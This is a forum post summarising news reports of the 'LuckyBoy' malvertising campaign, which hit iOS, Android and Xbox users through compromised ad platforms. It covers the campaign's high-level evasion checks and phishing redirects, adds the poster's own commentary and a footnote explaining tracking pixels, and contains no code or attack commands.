Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

'Luckyboy' Malvertising campaign hits iOS, Android, Xbox users

Executive Summary:

  1.  LuckyBoy Malvertising campaign has penetrated 10 Demand Side Platforms (DSPs) (where platform publishers sell advertising space), mostly in Europe but with confirmed cases in the US and Canada.
  2. Security vendor Media Trust has said that the malware checks for the presence of blockers, testing environments (such as being loaded onto a virtual machine) and active debuggers, and will not execute if found.
  3. The users behind LuckyBoy are being exceptionally careful at being caught for this type of Malvertising, indicating a well versed team in this type of campaign.



Should it run on a target environment, the malware executes a tracking pixel programmed to redirect the user to malicious content, including phishing pages and fake software updates.

It is not uncommon for Android applications to have bad adverts embedded in that have been applied once Google's automatic application vetting process has given the greenlight, however they have made significant progress in the last year removing applications (normally based on a paid alternative with similar functions, or simply fake apps designed to look legitmate) that break their rules.



“LuckyBoy is likely executing tests, probing to gauge their success before launching a broader attack. Campaign was confirmed to execute on tags wrapped with malware blocking code, bypassing these defenses as further evidence that its sophistication is impressive,” The Media Trust notes in a report shared with SecurityWeek.

It is not insignificant in the threat landscape that an attacker like this tries to hide from detection, and even more impressive that they are hiding from non-desired targets. Whether or not it is removed from a non-target system remains to be seen.


Closing thoughts

Notable in this case is the sophisticated use of tracking pixels1. This could be an attempt to decide who a target of interest may be, before executing the payload - who this could apply to remains to be seen. It will be interesting to see who the targets are, and how their evasion techniques adjust to ensure low detection probabillities within systems. There is also very little users can do to combat the malvertising, as the publisher will apply the advertising to those that their data shows it is relevant to, possibly limited the targets available in some way. I expect affected devices will require patching however it should be on the penetrated DSP provider to resolve any issues.






1: Marketing pixels, aka tracking pixels, are essentially these tiny snippets of code that allow you to gather information about visitors on a website—how they browse, what type of ads they click on, etc. This behavior data helps you, as a marketer, send the user paid ads that are likely to be most interesting to them.

CPU: i5 4690 Motherboard: MSI Z97s Krait Edition RAM: 16GB HyperX (4x4GB) GPU: MSI Gaming X Trio RTX 2070 Storage: Samsung 840 EVO 120GB, Crucial BX100 250GB SSD, Seagate 1TB HDD  PSU: Corsair RM850i Monitor: Dell Ultrasharp U2414H 23.8" Cooling: Corsair H80i GT Case: NZXT H440





Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now